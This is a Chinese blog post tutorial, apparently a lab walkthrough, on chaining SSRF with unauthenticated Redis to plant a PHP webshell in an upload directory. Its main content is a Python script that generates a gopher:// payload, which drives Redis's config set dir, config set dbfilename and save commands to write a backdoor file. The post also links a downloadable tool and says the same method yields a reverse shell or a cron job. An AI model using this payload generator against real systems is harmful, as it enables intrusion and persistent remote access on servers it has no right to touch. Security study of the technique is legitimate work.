• 组合拳SSRF+redis未授权访问


    目录

    一、SSRF

    二、redis未授权访问

    三、组合利用

    1.写入Webshell

    2.反弹shell


    一、SSRF

    一台web服务器对其他服务器发起请求,以加载其他服务器的web内容或数据

    但因请求参数没有进行严格过滤,攻击者可能会通过SSRF漏洞来访问敏感数据、执行未经授权的操作,或者将服务器用于发起攻击其他系统的请求。

    二、redis未授权访问

    redis数据库如果布置在公网,也就是0.0.0.0,并且没有设置密码,那攻击者可以直接访问redis数据库,通过redis数据库的持久化直接写入后门

    如果是绑定在127.0.0.1上,我们直接访问是不行的,所以可以通过ssrf漏洞去访问本地的redis

    三、组合利用

    通过phpinfo可以发现ip为172.28.0.3,探测172.28.0.2服务器,发现存活

    前面的步骤就不仔细讲了,主要是讲通过redis如何写入后门

    发现ssrf后,利用bp爆破端口,可以发现6379端口返回了redis的报错信息,说明有redis未授权

    那么我们可以直接写入后门,这时有三种方法

    1.写入Webshell

    这时我们可以在其web目录下通过redis写入后门,但发现不能直接在/var/www/html目录下面写

    dirb爆破目录发现有upload目录,那可以写到upload目录下

    通过Python脚本或者Gopher-master生成payload

    1. import urllib.parse
    2. protocol = "gopher://"
    3. ip = "172.22.0.2" # 运行着redis的内网主机ip
    4. port = "6379"
    5. shell = "\n\n\n\n"
    6. filename = "shell.php"
    7. path = "/var/www/html/upload"
    8. passwd = ""
    9. cmd = ["flushall",
    10. "set 1 {}".format(shell.replace(" ", "${IFS}")),
    11. "config set dir {}".format(path),
    12. "config set dbfilename {}".format(filename),
    13. "save"
    14. ]
    15. if passwd:
    16. cmd.insert(0, "AUTH {}".format(passwd))
    17. payload = protocol + ip + ":" + port + "/_"
    18. def redis_format(arr):
    19. CRLF = "\r\n"
    20. redis_arr = arr.split(" ")
    21. cmd = ""
    22. cmd += "*" + str(len(redis_arr))
    23. for x in redis_arr:
    24. cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    25. cmd += CRLF
    26. return cmd
    27. if __name__ == "__main__":
    28. for x in cmd:
    29. payload += urllib.parse.quote(redis_format(x))
    30. print(payload)

    链接:https://pan.baidu.com/s/153ti5n69QI_CPhUta1WpbA?pwd=9peq 
    提取码:9peq

    生成后还需要进行一次urlcode编码,因为生成出来的payload是gopher协议的url编码,所以我们放到浏览器中还需要进行一次urlcode编码

     

    2.反弹shell

    和写入Webshell一样,只是把system里面的语句换成反弹shell的语句就行

    也可以写入计划任务 

  • 相关阅读:
    TorchDrug--药物属性预测
    docker数据目录迁移
    认识 https 以及 https的通信流程
    Redis分布式锁剖析和几种客户端的实现
    (未学懂,待填坑)【数据结构】哈夫曼树
    智能晾衣架(一)--设计
    机器学习-预备知识
    猿创征文| Dcoker实战:Linux环境安装Redis图文教程
    部署Squid 代理服务器
    Nacos集群搭建
  • 原文地址:https://blog.csdn.net/CQ17743254852/article/details/132895542